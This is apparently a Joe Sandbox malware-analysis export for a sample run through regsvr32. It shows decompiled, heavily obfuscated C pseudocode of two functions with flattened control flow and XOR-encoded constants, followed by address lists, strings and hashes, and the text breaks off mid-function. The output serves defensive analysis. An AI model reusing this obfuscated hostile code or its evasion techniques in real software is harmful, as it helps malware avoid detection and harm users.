				signed int _t555;
				signed int _t572;
				void* _t575;
				signed int _t579;
				signed int _t587;
				void* _t592;
				void* _t598;
				signed int _t599;
				signed int _t601;
				signed int _t602;
				signed int _t605;
				signed int _t613;
				signed int _t614;
				signed int _t617;
				signed int _t618;
				signed int _t622;
				signed int _t624;
				signed int _t626;
				signed int _t631;
				void* _t634;
				void* _t645;
				void* _t674;
				void* _t676;
				intOrPtr _t679;
				void* _t680;
				void* _t681;
				void* _t686;

				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0x20);
				E003C2528(_t519);
				_t681 = _t680 + 0x20;
				_v12 = 0x7ff18;
				_t679 = 0;
				_t592 = 0x5b2b5;
				_v8 = 0;
				_t676 = 0x583f2;
				_t674 = 0x285ec;
				while(1) {
					L1:
					_t521 = 0x1dd3f;
					while(1) {
						L2:
						_t598 = 0xf5cee;
						while(1) {
							L3:
							_t634 = 0x9f072;
							do {
								L4:
								_t686 = _t592 - _t676;
								if(_t686 > 0) {
									__eflags = _t592 - 0x5b2b5;
									if(_t592 == 0x5b2b5) {
										_t592 = 0x362cc;
										goto L25;
									} else {
										__eflags = _t592 - _t634;
										if(__eflags == 0) {
											_v48 = 0x7aa34d;
											_v48 = _v48 ^ 0x0e3c81c2;
											_v48 = _v48 + 0xffff7055;
											_v48 = _v48 ^ 0xa4a03190;
											_v48 = _v48 ^ 0xaaee37d4;
											_v36 = 0x2f42a1;
											_v36 = _v36 + 0x4395;
											_v36 = _v36 ^ 0x002f9666;
											_v40 = 0x6fab44;
											_v40 = _v40 ^ 0x60a23d40;
											_v40 = _v40 | 0x5a2b1f6c;
											_v40 = _v40 ^ 0x7ae59a1a;
											_push(_t598);
											_push(_t598);
											_t572 = E003C8D52(_t598, _v16, __eflags);
											__eflags = _t572;
											_v20 = _t572;
											_t592 =  !=  ? _t676 : _t674;
											goto L1;
										} else {
											__eflags = _t592 - 0xe21de;
											if(_t592 == 0xe21de) {
												_v40 = 0xc837c;
												_v40 = _v40 + 0xcf4;
												_v40 = _v40 >> 0xb;
												_v40 = _v40 ^ 0x0008ba4a;
												_v36 = 0x87942c;
												_t622 = 0x18;
												_v36 = _v36 / _t622;
												_v36 = _v36 ^ 0x0007a64e;
												_v52 = 0xc76eb0;
												_v52 = _v52 + 0xffff2183;
												_v52 = _v52 << 0xf;
												_v52 = _v52 >> 5;
												_v52 = _v52 ^ 0x024288b3;
												_v48 = 0x69433c;
												_v48 = _v48 << 9;
												_v48 = _v48 + 0xffffd247;
												_v48 = _v48 + 0xa4f4;
												_v48 = _v48 ^ 0xd2804a02;
												_t575 = E003CD933(_v40, _v36, 0x3c12ac, _v52, _v48);
												_v44 = 0x842b63;
												_v44 = _v44 + 0xffffd6e4;
												_v44 = _v44 ^ 0x008f384f;
												_v40 = 0x1b2ea9;
												_v40 = _v40 | 0x684a4daa;
												_v40 = _v40 ^ 0x685ee49e;
												_v52 = 0x8660b6;
												_v52 = _v52 + 0x13f1;
												_v52 = _v52 >> 0xd;
												_v52 = _v52 ^ 0x9b4e69ae;
												_v52 = _v52 ^ 0x9b418f80;
												_v36 = 0xd43113;
												_v36 = _v36 ^ 0x8f349ad7;
												_v36 = _v36 ^ 0x8fe15dca;
												_v48 = 0x27618a;
												_t624 = 0x73;
												_v48 = _v48 / _t624;
												_v48 = _v48 << 0x10;
												_v48 = _v48 >> 4;
												_v48 = _v48 ^ 0x0572f218;
												_t579 = E003D2B70( &_v16, _v44, _t575, _v28, _v40, _t624, _v52, _v36,  &_v24, _v48);
												_t681 = _t681 + 0x2c;
												_v40 = 0x5f1155;
												__eflags = _t579;
												_t592 =  ==  ? 0x9f072 : _t674;
												_t626 = 0x6d;
												_v40 = _v40 / _t626;
												_v40 = _v40 * 9;
												_v40 = _v40 ^ 0x00065d55;
												_v52 = 0x192cc6;
												_v52 = _v52 >> 1;
												_v52 = _v52 | 0xb219c35c;
												_v52 = _v52 >> 3;
												_v52 = _v52 ^ 0x164332fa;
												_v48 = 0x28bd09;
												_v48 = _v48 << 0xe;
												_v48 = _v48 * 0x78;
												_v48 = _v48 >> 0xa;
												_v48 = _v48 ^ 0x0007504a;
												E003C43D3(_v40, _v52, _v48, _t575);
												goto L13;
											} else {
												__eflags = _t592 - _t598;
												if(_t592 != _t598) {
													goto L25;
												} else {
													_v48 = 0x36e566;
													_v48 = _v48 | 0x10a6fc1e;
													_v48 = _v48 ^ 0x10bd9457;
													_v44 = 0x5ec970;
													_v44 = _v44 | 0xfbf93ce5;
													_v44 = _v44 ^ 0xfbffeb6b;
													_v40 = 0xda4db9;
													_v40 = _v40 * 0xc;
													_v40 = _v40 + 0xfffff3a7;
													_v40 = _v40 ^ 0x0a37dadb;
													_v36 = 0x492648;
													_v36 = _v36 + 0xffff70b7;
													_v36 = _v36 ^ 0x00416fd7;
													_t587 = E003DC528(_a16, _v32, _a24, _t598, _v48, _v44, _v40, _v36);
													_t681 = _t681 + 0x18;
													__eflags = _t587;
													_t521 = 0x1dd3f;
													_t592 =  ==  ? 0x1dd3f : 0x108ab;
													goto L2;
												}
											}
										}
									}
								} else {
									if(_t686 == 0) {
										_v40 = 0xade6a;
										_v40 = _v40 ^ 0x38107c1c;
										_v40 = _v40 | 0x4c7540df;
										_v40 = _v40 ^ 0x7c7a9038;
										_v44 = 0xcde258;
										_v44 = _v44 | 0xe0d5e8c5;
										_v44 = _v44 + 0xffffbec1;
										_v44 = _v44 ^ 0xe0db8069;
										_v56 = 0x1b3fed;
										_v56 = _v56 + 0xffff557b;
										_t599 = 0x22;
										_v56 = _v56 * 0x4d;
										_v56 = _v56 ^ 0x07f37757;
										_v52 = 0x1efbfe;
										_v52 = _v52 + 0x75c4;
										_v52 = _v52 * 0x7d;
										_v52 = _v52 ^ 0x0f5214f1;
										_v48 = 0x6e27e9;
										_v48 = _v48 >> 0xb;
										_v48 = _v48 / _t599;
										_v48 = _v48 ^ 0x0006df63;
										_v36 = 0x1cc993;
										_v36 = _v36 + 0xad9a;
										_v36 = _v36 ^ 0x001864de;
										_t527 = E003C5EC9(_v20, _v40, _t599, _v44, _v28, _t599, _v56, _v16, _t599, _v52, _v48, _v36,  &_v32);
										_t681 = _t681 + 0x2c;
										__eflags = _t527;
										_t598 = 0xf5cee;
										_t521 = 0x1dd3f;
										_t592 =  ==  ? 0xf5cee : 0x3aba5;
										goto L3;
									} else {
										if(_t592 == 0x108ab) {
											_v48 = 0x1675b0;
											_t601 = 0x26;
											_v48 = _v48 / _t601;
											_t602 = 0x65;
											_v48 = _v48 * 0x7d;
											_v48 = _v48 ^ 0x00436b16;
											_v40 = 0xa07dbf;
											_v40 = _v40 / _t602;
											_v40 = _v40 ^ 0x000f4654;
											E003CFDC1(_v48, _v32, _v40);
											_t592 = 0x3aba5;
											while(1) {
												L1:
												_t521 = 0x1dd3f;
												goto L2;
											}
										} else {
											if(_t592 == _t521) {
												_v48 = 0x7b13c4;
												_v48 = _v48 ^ 0xd41b1492;
												_t605 = 0x33;
												_v48 = _v48 * 0xf;
												_v48 = _v48 | 0x0f5d9e86;
												_v48 = _v48 ^ 0x7ffefcdb;
												_v40 = 0x379b2;
												_v40 = _v40 + 0xffff714c;
												_v40 = _v40 ^ 0x000523d6;
												_v56 = 0x7e4c65;
												_v56 = _v56 << 0xe;
												_v56 = _v56 ^ 0xf4af6d54;
												_v56 = _v56 ^ 0x67bd7f3d;
												_v52 = 0xd85a2a;
												_v52 = _v52 | 0xcfa288d1;
												_v52 = _v52 / _t605;
												_v52 = _v52 ^ 0x041c2741;
												_push(_v32);
												_push(_a20);
												_push(_v52);
												_push(_v56);
												_push(_t605);
												_push(_v40);
												_t645 = 0x20;
												_t537 = E003D9F86(_v48, _t645);
												_t681 = _t681 + 0x18;
												_t592 = 0x108ab;
												__eflags = _t537;
												_t679 =  ==  ? 1 : _t679;
												while(1) {
													L1:
													_t521 = 0x1dd3f;
													goto L2;
												}
											} else {
												if(_t592 == _t674) {
													_v52 = 0x73adfa;
													_v52 = _v52 * 0x71;
													_v52 = _v52 << 0x10;
													_v52 = _v52 | 0xbd83ba13;
													_v52 = _v52 ^ 0xffd83192;
													_v48 = 0xb671a5;
													_v48 = _v48 * 0x5d;
													_v48 = _v48 * 0x57;
													_v48 = _v48 * 0x49;
													_t514 =  &_v48;
													 *_t514 = _v48 ^ 0x46765eee;
													__eflags =  *_t514;
													E003D8B16(_v52, _v28, _t598, _v48);
												} else {
													if(_t592 == 0x362cc) {
														_v56 = 0xdd15d3;
														_v56 = _v56 * 0x25;
														_v56 = _v56 * 0x3c;
														_v56 = _v56 ^ 0x7d303b19;
														_v40 = 0xa1ae94;
														_v40 = _v40 >> 2;
														_v40 = _v40 ^ 0x0027d1ec;
														_v52 = 0x94bd7;
														_v52 = _v52 ^ 0x4220e7aa;
														_v52 = _v52 + 0x3461;
														_v52 = _v52 ^ 0x4221989d;
														_v48 = 0x66ec3e;
														_v48 = _v48 + 0xc186;
														_v48 = _v48 >> 0xc;
														_v48 = _v48 ^ 0x00061a32;
														_t546 = E003CD933(_v56, _v40, 0x3c11fc, _v52, _v48);
														_v48 = 0x188319;
														_v48 = _v48 + 0x67c;
														_v48 = _v48 | 0x1aa354e1;
														_v48 = _v48 ^ 0x1abb9713;
														_v56 = 0xec8ec1;
														_v56 = _v56 | 0x6b5e4a72;
														_v56 = _v56 << 0xa;
														_v56 = _v56 ^ 0x2b37ab5d;
														_v56 = _v56 ^ 0xd000630d;
														_v40 = 0x89840a;
														_t613 = 0x31;
														_v40 = _v40 * 0x36;
														_v40 = _v40 ^ 0x1d097389;
														_v52 = 0x34de97;
														_v52 = _v52 | 0xe9997372;
														_t614 = 0x62;
														_v52 = _v52 / _t613;
														_v52 = _v52 / _t614;
														_v52 = _v52 ^ 0x0009f7e4;
														_t552 = E003CD933(_v48, _v56, 0x3c121c, _v40, _v52);
														_v48 = 0xd7119a;
														_v48 = _v48 + 0x4c27;
														_v48 = _v48 | 0xe5effdb5;
														_v48 = _v48 ^ 0xe5f8d9bc;
														_v56 = 0xe2fa2;
														_v56 = _v56 << 0x10;
														_v56 = _v56 + 0xffffc760;
														_v56 = _v56 + 0xffff0fc3;
														_v56 = _v56 ^ 0x2fa32126;
														_v52 = 0xa864ce;
														_v52 = _v52 * 0x4b;
														_v52 = _v52 << 4;
														_v52 = _v52 * 0xe;
														_v52 = _v52 ^ 0x2ad48e72;
														_v40 = 0x66091f;
														_v40 = _v40 | 0x497ceafa;
														_v40 = _v40 ^ 0x49712ffd;
														_t555 = E003C22D2( &_v28, _v48, _t546, _v56, _v52, _t552, _v40);
														_v52 = 0xa86f6b;
														__eflags = _t555;
														_t592 =  ==  ? 0xe21de : 0x8201;
														_v52 = _v52 * 0x32;
														_v52 = _v52 * 0x5c;
														_v52 = _v52 ^ 0x712c3406;
														_v52 = _v52 ^ 0xa3b1f317;
														_v48 = 0x5580be;
														_v48 = _v48 * 0x12;
														_v48 = _v48 * 0x37;
														_v48 = _v48 + 0xb390;
														_v48 = _v48 ^ 0x4aa867cf;
														_v56 = 0x446486;
														_v56 = _v56 + 0xffff4662;
														_v56 = _v56 + 0x11b1;
														_v56 = _v56 ^ 0x0049727a;
														_t180 =  &_v56; // 0x49727a
														E003C43D3(_v52, _v48,  *_t180, _t546);
														_v44 = 0xb7dfeb;
														_t617 = 0x45;
														_v44 = _v44 / _t617;
														_v44 = _v44 ^ 0x000d1ba8;
														_v40 = 0x151c1;
														_t618 = 0x22;
														_v40 = _v40 * 0x2b;
														_v40 = _v40 ^ 0x003b62fd;
														_v48 = 0xb8acb1;
														_v48 = _v48 * 0x24;
														_v48 = _v48 >> 1;
														_v48 = _v48 / _t618;
														_t208 =  &_v48;
														 *_t208 = _v48 ^ 0x006e8276;
														__eflags =  *_t208;
														E003C43D3(_v44, _v40, _v48, _t552);
														_t681 = _t681 + 0x40;
														_t674 = 0x285ec;
														L13:
														_t676 = 0x583f2;
														_t521 = 0x1dd3f;
														_t598 = 0xf5cee;
														_t634 = 0x9f072;
														goto L25;
													} else {
														_t691 = _t592 - 0x3aba5;
														if(_t592 != 0x3aba5) {
															goto L25;
														} else {
															_v40 = 0x8cf181;
															_v40 = _v40 | 0xc8cb6ef2;
															_v40 = _v40 ^ 0xc8c6c388;
															_v52 = 0x17e473;
															_t631 = 0x4a;
															_v52 = _v52 / _t631;
															_v52 = _v52 << 0xe;
															_v52 = _v52 | 0x1450f1e1;
															_v52 = _v52 ^ 0x14f50fdd;
															_v48 = 0x2c6d1d;
															_v48 = _v48 >> 2;
															_v48 = _v48 * 0x60;
															_v48 = _v48 ^ 0x042ba8e9;
															_v56 = 0xc2c66b;
															_v56 = _v56 ^ 0x8a406231;
															_v56 = _v56 + 0xf95e;
															_v56 = _v56 | 0xce1d2406;
															_v56 = _v56 ^ 0xce90f4a5;
															E003C79D0(_v40, _v52, _t691, _v48, _v20, _v56);
															_t681 = _t681 + 0xc;
															_t592 = _t674;
															while(1) {
																L1:
																_t521 = 0x1dd3f;
																L2:
																_t598 = 0xf5cee;
																L3:
																_t634 = 0x9f072;
																goto L4;
															}
														}
													}
												}
											}
										}
									}
								}
								L28:
								return _t679;
								L25:
								__eflags = _t592 - 0x8201;
							} while (__eflags != 0);
							goto L28;
						}
					}
				}
			}

0x003cec64
0x003cec68
0x003cec6c
0x003cec70
0x003cec74
0x003cec78
0x003cec7c
0x003cec7d
0x003cec7f
0x003cec84
0x003cec87
0x003cec8f
0x003cec91
0x003cec96
0x003cec9a
0x003cec9f
0x003ceca4
0x003ceca4
0x003ceca4
0x003ceca9
0x003ceca9
0x003ceca9
0x003cecae
0x003cecae
0x003cecae
0x003cecb3
0x003cecb3
0x003cecb3
0x003cecb5
0x003cf2dc
0x003cf2e2
0x003cf623
0x00000000
0x003cf2e8
0x003cf2e8
0x003cf2ea
0x003cf59a
0x003cf5a2
0x003cf5aa
0x003cf5b2
0x003cf5ba
0x003cf5c2
0x003cf5ca
0x003cf5d2
0x003cf5da
0x003cf5e2
0x003cf5ea
0x003cf5f2
0x003cf60a
0x003cf60b
0x003cf60c
0x003cf611
0x003cf613
0x003cf61b
0x00000000
0x003cf2f0
0x003cf2f0
0x003cf2f6
0x003cf3a6
0x003cf3b0
0x003cf3b8
0x003cf3bd
0x003cf3c5
0x003cf3d3
0x003cf3d6
0x003cf3da
0x003cf3e2
0x003cf3ea
0x003cf3f2
0x003cf3f7
0x003cf3fc
0x003cf404
0x003cf40c
0x003cf411
0x003cf419
0x003cf421
0x003cf43e
0x003cf443
0x003cf44d
0x003cf457
0x003cf45f
0x003cf467
0x003cf46f
0x003cf477
0x003cf47f
0x003cf487
0x003cf48c
0x003cf494
0x003cf49c
0x003cf4a4
0x003cf4ac
0x003cf4b4
0x003cf4c2
0x003cf4c8
0x003cf4d0
0x003cf4d5
0x003cf4da
0x003cf501
0x003cf506
0x003cf509
0x003cf511
0x003cf51a
0x003cf525
0x003cf528
0x003cf531
0x003cf535
0x003cf53d
0x003cf545
0x003cf549
0x003cf551
0x003cf556
0x003cf55e
0x003cf566
0x003cf571
0x003cf575
0x003cf57a
0x003cf58e
0x00000000
0x003cf2fc
0x003cf2fc
0x003cf2fe
0x00000000
0x003cf304
0x003cf304
0x003cf30c
0x003cf314
0x003cf31c
0x003cf324
0x003cf32c
0x003cf334
0x003cf341
0x003cf345
0x003cf34d
0x003cf355
0x003cf35d
0x003cf365
0x003cf38a
0x003cf38f
0x003cf397
0x003cf399
0x003cf39e
0x00000000
0x003cf39e
0x003cf2fe
0x003cf2f6
0x003cf2ea
0x003cecbb
0x003cecbb
0x003cf1d1
0x003cf1db
0x003cf1e3
0x003cf1eb
0x003cf1f3
0x003cf1fb
0x003cf203
0x003cf20b
0x003cf213
0x003cf21b
0x003cf22a
0x003cf22b
0x003cf22f
0x003cf237
0x003cf23f
0x003cf24c
0x003cf250
0x003cf258
0x003cf260
0x003cf26b
0x003cf273
0x003cf27b
0x003cf283
0x003cf28b
0x003cf2bb
0x003cf2c0
0x003cf2c8
0x003cf2ca
0x003cf2cf
0x003cf2d4
0x00000000
0x003cecc1
0x003cecc7
0x003cf16e
0x003cf17e
0x003cf183
0x003cf18e
0x003cf18f
0x003cf193
0x003cf19b
0x003cf1a9
0x003cf1ad
0x003cf1c1
0x003cf1c7
0x003ceca4
0x003ceca4
0x003ceca4
0x00000000
0x003ceca4
0x003ceccd
0x003ceccf
0x003cf0b3
0x003cf0bd
0x003cf0cc
0x003cf0cd
0x003cf0d1
0x003cf0d9
0x003cf0e1
0x003cf0e9
0x003cf0f1
0x003cf0f9
0x003cf101
0x003cf106
0x003cf10e
0x003cf116
0x003cf11e
0x003cf12c
0x003cf130
0x003cf138
0x003cf13c
0x003cf140
0x003cf144
0x003cf148
0x003cf149
0x003cf153
0x003cf154
0x003cf15b
0x003cf15f
0x003cf164
0x003cf166
0x003ceca4
0x003ceca4
0x003ceca4
0x00000000
0x003ceca4
0x003cecd5
0x003cecd7
0x003cf636
0x003cf643
0x003cf647
0x003cf64c
0x003cf654
0x003cf65c
0x003cf669
0x003cf672
0x003cf67b
0x003cf67f
0x003cf67f
0x003cf67f
0x003cf694
0x003cecdd
0x003cece3
0x003ceda2
0x003cedaf
0x003cedb8
0x003cedbc
0x003cedc4
0x003cedcc
0x003cedd1
0x003cedd9
0x003cede1
0x003cede9
0x003cedf1
0x003cedf9
0x003cee01
0x003cee09
0x003cee0e
0x003cee2b
0x003cee30
0x003cee3a
0x003cee45
0x003cee4f
0x003cee57
0x003cee5f
0x003cee67
0x003cee6c
0x003cee74
0x003cee7c
0x003cee8b
0x003cee8e
0x003cee92
0x003cee9a
0x003ceea2
0x003ceeb0
0x003ceeb1
0x003ceebd
0x003ceec1
0x003ceede
0x003ceee3
0x003ceeed
0x003ceef8
0x003cef00
0x003cef08
0x003cef10
0x003cef15
0x003cef1d
0x003cef25
0x003cef2d
0x003cef3a
0x003cef3e
0x003cef48
0x003cef4c
0x003cef54
0x003cef5c
0x003cef64
0x003cef82
0x003cef87
0x003cef8f
0x003cef9b
0x003cefa4
0x003cefad
0x003cefb1
0x003cefb9
0x003cefc1
0x003cefce
0x003cefd7
0x003cefdb
0x003cefe3
0x003cefeb
0x003ceff3
0x003ceffb
0x003cf003
0x003cf00b
0x003cf017
0x003cf01c
0x003cf02c
0x003cf031
0x003cf037
0x003cf03f
0x003cf04c
0x003cf04e
0x003cf052
0x003cf05a
0x003cf067
0x003cf06b
0x003cf075
0x003cf079
0x003cf079
0x003cf079
0x003cf08d
0x003cf092
0x003cf095
0x003cf09a
0x003cf09a
0x003cf09f
0x003cf0a4
0x003cf0a9
0x00000000
0x003cece9
0x003cece9
0x003cecef
0x00000000
0x003cecf5
0x003cecf5
0x003cecff
0x003ced07
0x003ced0f
0x003ced1d
0x003ced20
0x003ced24
0x003ced29
0x003ced31
0x003ced39
0x003ced41
0x003ced4b
0x003ced4f
0x003ced57
0x003ced5f
0x003ced67
0x003ced6f
0x003ced77
0x003ced93
0x003ced98
0x003ced9b
0x003ceca4
0x003ceca4
0x003ceca4
0x003ceca9
0x003ceca9
0x003cecae
0x003cecae
0x00000000
0x003cecae
0x003ceca4
0x003cecef
0x003cece3
0x003cecd7
0x003ceccf
0x003cecc7
0x003cecbb
0x003cf69d
0x003cf6a4
0x003cf628
0x003cf628
0x003cf628
0x00000000
0x003cf634
0x003cecae
0x003ceca9

Strings

H&I, xrefs: 003CF355
rJ^k, xrefs: 003CEE5F
^vF, xrefs: 003CF67F
eL~, xrefs: 003CF0F9
a4, xrefs: 003CEDE9
zrI, xrefs: 003CF00B

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: H&I$a4$eL~$rJ^k$zrI$^vF
API String ID: 0-3249565742
Opcode ID: 7fd7e0761e246388bff2189839809a35c674c443286b22b405519625b07af202
Instruction ID: d24f8d8950e7f8fedce9eb050c7fefcfb656e704f883b6cae169b33e6d7e90bb
Opcode Fuzzy Hash: 7fd7e0761e246388bff2189839809a35c674c443286b22b405519625b07af202
Instruction Fuzzy Hash: 934222715093429FC349CF21D58A80BBBE1FBD8748F108A1DF5CAA6260D3B5DA498F87

Uniqueness

Uniqueness Score: -1.00%

Function 003CC7B4 Relevance: 7.9, Strings: 6, Instructions: 428
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E003CC7B4() {
				char _v520;
				char _v1040;
				void* _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				void* _t450;
				signed int _t464;
				signed int _t492;
				void* _t494;
				signed int _t495;
				signed int _t496;
				signed int _t498;
				signed int _t499;
				intOrPtr _t500;
				signed int _t503;
				signed int _t504;
				signed int _t505;
				signed int _t507;
				signed int _t514;
				signed int _t515;
				void* _t518;
				signed int _t548;
				intOrPtr _t549;
				intOrPtr* _t550;
				signed int* _t553;
				void* _t555;

				_t553 =  &_v1128;
				_v1072 = _v1072 & 0x00000000;
				_t494 = 0x55b73;
				_t493 = _v1072;
				_t552 = _v1072;
				_v1056 = 0x4bc6c;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t548 = _v1072;
				while(1) {
					L1:
					_t518 = 0x5c;
					do {
						while(1) {
							L2:
							_t555 = _t494 - 0x87920;
							if(_t555 > 0) {
								break;
							}
							if(_t555 == 0) {
								_t549 =  *0x3e2208; // 0x28e510
								_t550 = _t549 + 0x22c;
								while( *_t550 != _t518) {
									_t550 = _t550 + 2;
								}
								_t548 = _t550 + 2;
								_t494 = 0xc1fdf;
								continue;
							} else {
								if(_t494 == 0x16310) {
									_v1120 = 0x132ab5;
									_t507 = 0x1c;
									_v1120 = _v1120 / _t507;
									_v1120 = _v1120 + 0xffff3f85;
									_v1120 = _v1120 ^ 0xfff00f9a;
									_v1124 = 0xdbd3df;
									_v1124 = _v1124 + 0xfffff197;
									_v1124 = _v1124 ^ 0x00da2208;
									_v1128 = 0x3fff8d;
									_v1128 = _v1128 << 3;
									_v1128 = _v1128 + 0xffff1c36;
									_v1128 = _v1128 ^ 0x01fb2716;
									E003DA952(_v1120, _v1124, _v1128, _t552);
									L11:
									_t494 = 0x50475;
									while(1) {
										L1:
										_t518 = 0x5c;
										goto L2;
									}
								} else {
									if(_t494 == 0x50475) {
										_v1124 = 0x7ecab8;
										_v1124 = _v1124 + 0xffff77c5;
										_v1124 = _v1124 << 1;
										_v1124 = _v1124 ^ 0x00f0baad;
										_v1120 = 0x6fea71;
										_v1120 = _v1120 + 0x2827;
										_v1120 = _v1120 + 0xffff3192;
										_v1120 = _v1120 >> 0xf;
										_v1120 = _v1120 ^ 0x0000fd12;
										_v1128 = 0x395338;
										_v1128 = _v1128 << 0xf;
										_v1128 = _v1128 + 0xcc60;
										_v1128 = _v1128 * 0x19;
										_v1128 = _v1128 ^ 0x904b2b7c;
										E003DA952(_v1124, _v1120, _v1128, _t493);
									} else {
										if(_t494 == 0x55b73) {
											_v1108 = 0xe2e2c3;
											_v1108 = _v1108 >> 6;
											_v1108 = _v1108 ^ 0x00038ba2;
											_v1104 = 0xcd1284;
											_v1104 = _v1104 + 0xd46f;
											_t514 = 0x7c;
											_v1104 = _v1104 / _t514;
											_t515 = 0xb;
											_push(_t515);
											_push(_t515);
											_v1104 = _v1104 * 0x42;
											_v1104 = _v1104 ^ 0x006427a0;
											_v1124 = 0xf5163d;
											_v1124 = _v1124 * 0x44;
											_v1124 = _v1124 ^ 0x41147574;
											_v1112 = 0xee4c69;
											_v1112 = _v1112 + 0xffff6a9d;
											_v1112 = _v1112 / _t515;
											_v1112 = _v1112 + 0x953f;
											_v1112 = _v1112 ^ 0x001ae99e;
											_v1116 = 0xdec851;
											_v1116 = _v1116 ^ 0xe0bac502;
											_v1116 = _v1116 ^ 0x393604dd;
											_v1116 = _v1116 >> 0xb;
											_v1116 = _v1116 ^ 0x001e6b92;
											_v1128 = 0xf8dafe;
											_v1128 = _v1128 >> 5;
											_v1128 = _v1128 ^ 0x2eec4b97;
											_v1128 = _v1128 ^ 0x2ee6559e;
											E003CD5B0(_v1108,  &_v1040, _v1104, _v1124, _v1112, _v1116, _t515, _v1128);
											_t553 =  &(_t553[8]);
											_t494 = 0x924d4;
											while(1) {
												L1:
												_t518 = 0x5c;
												goto L2;
											}
										} else {
											if(_t494 != 0x7c907) {
												goto L24;
											} else {
												_v1116 = 0xd5a825;
												_v1116 = _v1116 | 0xe2cfdceb;
												_v1116 = _v1116 ^ 0xb88e449f;
												_v1116 = _v1116 >> 2;
												_v1116 = _v1116 ^ 0x16903fae;
												_v1128 = 0x113493;
												_v1128 = _v1128 | 0xfb1258e8;
												_v1128 = _v1128 >> 4;
												_v1128 = _v1128 ^ 0x0fb97c4f;
												_v1112 = 0x98c83;
												_v1112 = _v1112 << 0xe;
												_v1112 = _v1112 | 0x9ff19e55;
												_v1112 = _v1112 ^ 0xfffeabc9;
												_v1124 = 0x553280;
												_v1124 = _v1124 >> 5;
												_v1124 = _v1124 ^ 0x00042699;
												E003D31D5(_v1116, _v1128, _v1112, _t493, _t552, _v1124);
												_t553 =  &(_t553[4]);
												_t494 = 0x16310;
												while(1) {
													L1:
													_t518 = 0x5c;
													goto L2;
												}
											}
										}
									}
								}
							}
							L27:
							return _v1072;
						}
						if(_t494 == 0x924d4) {
							_v1120 = 0x3586a2;
							_v1120 = _v1120 << 0xa;
							_t495 = 0x30;
							_v1120 = _v1120 / _t495;
							_t496 = 0x47;
							_v1120 = _v1120 / _t496;
							_v1120 = _v1120 ^ 0x001ce4ba;
							_v1128 = 0x5cf31e;
							_v1128 = _v1128 ^ 0x93d4879d;
							_v1128 = _v1128 + 0x9694;
							_v1128 = _v1128 + 0xffff3d55;
							_v1128 = _v1128 ^ 0x93866f35;
							_v1124 = 0x1575a7;
							_v1124 = _v1124 * 0xe;
							_v1124 = _v1124 + 0xffffd35d;
							_v1124 = _v1124 ^ 0x012c0f25;
							_v1100 = 0x589cd2;
							_v1100 = _v1100 ^ 0xf4861567;
							_v1100 = _v1100 ^ 0xf4dfe417;
							_t450 = E003CD933(_v1120, _v1128, 0x3c1020, _v1124, _v1100);
							_v1120 = 0x1a8bb2;
							_t498 = 0x76;
							_v1120 = _v1120 / _t498;
							_v1120 = _v1120 ^ 0x3abd963b;
							_t499 = 0x22;
							_v1120 = _v1120 / _t499;
							_v1120 = _v1120 ^ 0x01b3681e;
							_v1100 = 0xd5dbf7;
							_v1100 = _v1100 * 0x37;
							_v1100 = _v1100 ^ 0x2df928f8;
							_v1124 = 0xab2f9a;
							_v1124 = _v1124 | 0xefee7c95;
							_v1124 = _v1124 ^ 0xefe5b102;
							_v1128 = 0xcc1039;
							_v1128 = _v1128 << 0xe;
							_v1128 = _v1128 * 0x3e;
							_v1128 = _v1128 | 0x3556fc89;
							_v1128 = _v1128 ^ 0xff7b1785;
							_t500 =  *0x3e2208; // 0x28e510
							_t381 = _t500 + 0x1c; // 0x28e52c
							_t382 = _t500 + 0x22c; // 0x28e73c
							E003C2388(_v1120,  &_v520, _v1100, _v1124, _t450,  &_v1040, _v1128, _t382, _t381);
							_v1128 = 0xbbe070;
							_v1128 = _v1128 + 0x48f4;
							_v1128 = _v1128 + 0xffffc392;
							_v1128 = _v1128 << 6;
							_v1128 = _v1128 ^ 0x2efde641;
							_v1108 = 0x3d4f1;
							_v1108 = _v1108 + 0x7110;
							_v1108 = _v1108 >> 2;
							_v1108 = _v1108 ^ 0x000c92e9;
							_v1124 = 0xd9f205;
							_v1124 = _v1124 * 0x54;
							_v1124 = _v1124 >> 9;
							_v1124 = _v1124 ^ 0x002f745f;
							E003C43D3(_v1128, _v1108, _v1124, _t450);
							_t553 =  &(_t553[0xd]);
							_t494 = 0x87920;
							_t518 = 0x5c;
							goto L24;
						} else {
							if(_t494 == 0xc1fdf) {
								_v1128 = 0x4d602c;
								_v1128 = _v1128 >> 0x10;
								_v1128 = _v1128 | 0x8e2fe9a6;
								_v1128 = _v1128 + 0x1a4f;
								_v1128 = _v1128 ^ 0x8e3f0401;
								_v1124 = 0xc88421;
								_v1124 = _v1124 | 0x1aaf5815;
								_v1124 = _v1124 ^ 0x9ab770aa;
								_v1124 = _v1124 ^ 0x805b1349;
								_v1120 = 0x3d5653;
								_v1120 = _v1120 >> 7;
								_v1120 = _v1120 + 0x94b8;
								_v1120 = _v1120 + 0xffff627c;
								_v1120 = _v1120 ^ 0x000cd667;
								_t464 = E003D5053(_v1124, _v1120, _t494, _v1128);
								_t493 = _t464;
								_t553 =  &(_t553[3]);
								if(_t464 != 0) {
									_t494 = 0xc88e2;
									goto L1;
								}
							} else {
								if(_t494 != 0xc88e2) {
									goto L24;
								} else {
									_v1104 = 0xbf2661;
									_v1104 = _v1104 ^ 0x759f5859;
									_t503 = 0x23;
									_v1104 = _v1104 * 0x3d;
									_v1104 = _v1104 | 0x22ed2e16;
									_v1104 = _v1104 ^ 0xeaff3f5c;
									_v1088 = 0x84be1a;
									_v1088 = _v1088 + 0x23af;
